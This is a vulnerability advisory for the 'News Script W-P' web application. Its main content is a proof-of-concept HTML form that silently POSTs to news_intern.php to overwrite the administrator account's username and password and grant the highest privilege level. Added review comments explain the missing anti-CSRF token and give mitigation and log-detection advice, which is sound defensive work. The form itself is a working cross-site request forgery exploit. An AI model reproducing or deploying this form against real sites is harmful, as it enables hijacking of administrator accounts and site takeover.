< ------------------- header data start ------------------- >
#############################################################

# Application Name :News Script W-P

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir. (English: the admin account's details can be changed remotely and automatically.)

# author : Fl0riX - Bug Researchers

# Demo : http://www.web-php.de/demo/100017/event.php

#############################################################
< ------------------- header data end of ------------------- >
<!--
  Proof-of-concept form from the advisory, reproduced as published. Several
  attributes run together in this copy (for example "value=3checked"), so read
  it as an illustration of the request shape rather than as well-formed HTML.

  What it shows: a page on any origin can carry a POST form aimed at
  news_intern.php. Every parameter below is a fixed value; no per-session or
  per-request token appears among them. The advisory's claim is that the
  handler accepts the request when it arrives with a logged-in administrator's
  session cookie. Confirm this against the handler itself.

  Mitigation (review note): require an unpredictable anti-CSRF token bound to
  the session on every state-changing request, reject POSTs whose Origin or
  Referer is not the application's own, set SameSite on the session cookie, and
  ask for the current password before a credential or privilege change.

  Detection (review note): in web server logs, look for POSTs to
  news_intern.php carrying action=user_anlegen whose Referer or Origin points
  outside the site.
-->
<form name=Formular method=post onsubmit=return chkFormular()

action=http://www.site.com/[path]/10003/news_intern.php>
<!-- Fixed routing parameters. "user_anlegen" presumably selects the handler's
     create/update user operation ("anlegen" is German for "create"); verify
     against news_intern.php. user_id=1 is assumed to be the first (admin)
     account; TODO confirm. -->
<input type=hidden name=action value=user_anlegen>
<input type=hidden name=senden value=99>
<input type=hidden name=aus value=1>
<input type=hidden name=user_id value=1>
<!-- Privilege level choices 0 to 3. The option with value 3 carries the label
     "Can everything", which suggests it is the highest level. -->
<input type=radio name=userlevel value=0>
<input type=radio name=userlevel value=1 >
<input type=radio name=userlevel value=2 >
<input type=radio name=userlevel value=3checked >Can everything
<!-- Account fields sent with the request: username, email (empty here) and
     "passwort" (German for "password"). A server that applies these without a
     token check or re-authentication lets a forged request replace the
     account's credentials. -->
<input type=text class=input name=username size=30value=admin>
<input type=text class=input name=email size=30value=>
<input class=inputtype=password name=passwort size=30
value=1212124onBlur=if (value ==’’) {value = ’1212124’} onFocus=if (value == ’1212124’) {value =’’} />
<input type=submit class=ab value=fl0baba name=B1>
</form>
< -- bug code end of -- >